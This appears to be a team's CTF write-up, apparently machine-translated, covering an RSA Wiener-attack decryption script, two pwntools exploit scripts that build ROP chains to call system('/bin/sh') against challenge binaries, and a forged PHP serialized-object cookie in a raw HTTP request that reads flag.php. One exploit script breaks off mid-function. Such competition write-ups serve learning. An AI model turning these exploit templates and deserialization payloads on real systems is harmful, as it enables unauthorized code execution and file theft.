Undergraduate Group
1837
MTEgMTExIDAwMCAwMCAwMTExMSAwMDAgMDAxMCAwMDEgMTA
base64 -> transmos
flag{mosi1sfun}
rsa
e is large, considering wiener
import gmpy2 import libnum def continuedFra(x, y): """Calculate continued fractions :param x: numerator :param y: denominator :return: list of continued fractions """ cf = [] while y: cf.append(x // y) x, y = y, x % y return cf def gradualFra(cf): """Calculate the progressive score at the end of the incoming list :param cf: list of continued fractions :return: the asymptotic score at the end of the list """ numerator = 0 denominator = 1 for x in cf[::-1]: # The numerator and denominator of the progressive fraction here should be separated numerator, denominator = denominator, x * denominator + numerator return numerator, denominator def solve_pq(a, b, c): """Use the Vedic theorem to understand pq, x^2?(p + q)?x + pq=0 :param a: Coefficient of x^2 :param b:coefficient of x :param c:pq :return: p,q """ par = gmpy2.isqrt(b * b - 4 * a * c) return (-b + par) // (2 * a), (-b - par) // (2 * a) def getGradualFra(cf): """Computes the asymptotic scores for all lists :param cf: list of continued fractions :return: all asymptotic scores for the list """ gf = [] for i in range(1, len(cf) + 1): gf.append(gradualFra(cf[:i])) return gf def wienerAttack(e, n): """ :param e: :param n: :return: private key d """ cf = continuedFra(e, n) gf = getGradualFra(cf) for d, k in gf: if k == 0: continue if (e * d - 1) % k != 0: continue phi = (e * d - 1) // k p, q = solve_pq(1, n - phi + 1, n) if p * q == n: return d n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d 17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93b f e=0xe42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac0 18cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939 c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92 533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3 d=wienerAttack(e,n) print(d) m=pow(c,d,n) print(libnum.n2s(m).decode()) #flag1sH3r3_d_ist0sma1l
misc3
Two-question plaintext attack
CTF-Misc Essentials | JackHCC
Why can’t the original flag be handed in?
I can’t hand in the flag, ? Will there be a competition, flag crtl + c v v is not good? Get the answer right? Right understand?
Let’s make something to eat
#coding:utf-8 from pwn import * from LibcSearcher import * from sys import * context.log_level = 'debug' context.terminal = ['tmux','splitw','-h'] context(arch='amd64', os='linux') file = './food' p = process(file) e = ELF(file) rop = ROP(file) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') if args.R: p = remote('n',) e = ELF(file) libc = ELF('./libc-2.27.buu.so') lg = lambda s : log.success('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) uu32 = lambda data :u32(data.ljust(4,b'\x00')) uu64 = lambda data :u64(data.ljust(8,b'\x00')) uu32 = lambda data : u32(data. ljust(4, b'\x00')) uu64 = lambda data : u64(data. ljust(8, b'\x00')) sla = lambda x,y : p.sendlineafter(x,y) sa = lambda x,y : p.sendafter(x,y) sl = lambda x : p. sendline(x) s = lambda x : p.send(x) ru = lambda x : p.recvuntil(x) r = lambda x : p.recv(x) rl = lambda: p.recvline() system = 0 binsh = 0 poprdi = 0 ret = 0 libc_base = 0 def cuos(func, addr): global system, binsh, poprdi, ret, libc_base libc_base = addr - libc.sym[func] log.success('libc_base = ' + hex(libc_base)) system = libc_base + libc.sym['system'] log.success('system = ' + hex(system)) binsh = libc_base + next(libc. search(b'/bin/sh\x00')) log.success('binsh = ' + hex(binsh)) poprdi = rop.find_gadget(['pop rdi','ret'])[0] log.success('poprdi = ' + hex(poprdi)) ret = rop.find_gadget(['ret'])[0] log.success('ret = ' + hex(poprdi)) def csu(text,edi,rsi,rdx,rip): payload = b"" payload += p64(0x400c40 + 90) payload += p64(0) #rbx payload += p64(1) #rbp payload += p64(rip) #r12 payload += p64(rdx) #r13 payload += p64(rsi) #r14 payload += p64(edi) #r15 payload += p64(0x400c40 + 64) payload += p64(0)*7 return payload def debug(cmd=''): gdb. attach(p, cmd) #pause() #"b $rebase(0x10)" def add(index, size): sla('5.- Exit\\ ','1') sla('the food\\ ', str(index)) sla(' kcal.\\ ', str(size)) def edit(index,des):
just stack overflow
from pwn import * from struct import pack from ctypes import * import hashlib def s(a): p. send(a) def sa(a, b): p. sendafter(a, b) def sl(a): p. sendline(a) def sla(a, b): p. sendlineafter(a, b) def r(): p.recv() def pr(): print(p. recv()) def rl(a): return p.recvuntil(a) def inter(): p. interactive() def debug(): gdb. attach(p) pause() def get_addr(): return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb(): return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) context(os='linux', arch='amd64', log_level='debug') p = process('./pwn') #p = remote('', ) elf = ELF('./pwn') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') sla(b'have:\\ ', b'1') sla(b'numbers\\ ', b'1') def edit(idx, data): sla(b'exit\\ ', b'3') sla(b'change:\\ ', str(idx)) sla(b'number:\\ ', str(data)) edit(0x84, 0x9b) edit(0x85, 0x85) edit(0x86, 0x4) edit(0x87, 0x8) #gdb.attach(p, 'b *0x80488F2') sla(b'exit\\ ', b'5') #pause() inter()
pop
<?php header("content-type:text/html;charset=utf-8"); class Readme{ public $source; public function __toString() { return highlight_file('Readme.txt', true).highlight_file($this->source, true); } } if(isset($_GET['source'])){ $s = new Readme(); $s->source = __FILE__; echo $s; exit; } $todos = []; if(isset($_COOKIE['todos'])){ $c = $_COOKIE['todos']; $h = substr($c, 0, 32); $m = substr($c, 32); if(md5($m) === $h){ $todos = unserialize($m); } } if(isset($_POST['text'])){ $todo = $_POST['text']; $todos[] = $todo; $m = serialize($todos); $h = md5($m); setcookie('todos', $h.$m); header('Location: '.$_SERVER['REQUEST_URI']); exit; } ?>
GET /HTTP/1.1 Host: 1.1.2.100:1080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 6 Origin: http://1.1.2.100:1080 Connection: close Referer: http://1.1.2.100:1080/ Cookie: todos=fae1710f5e51885bcf095e718ca752cca:1:{i:0;O:6:"readme":1:{s:6:"source";s:10:"./flag.php"; }} Upgrade-Insecure-Requests: 1 text=1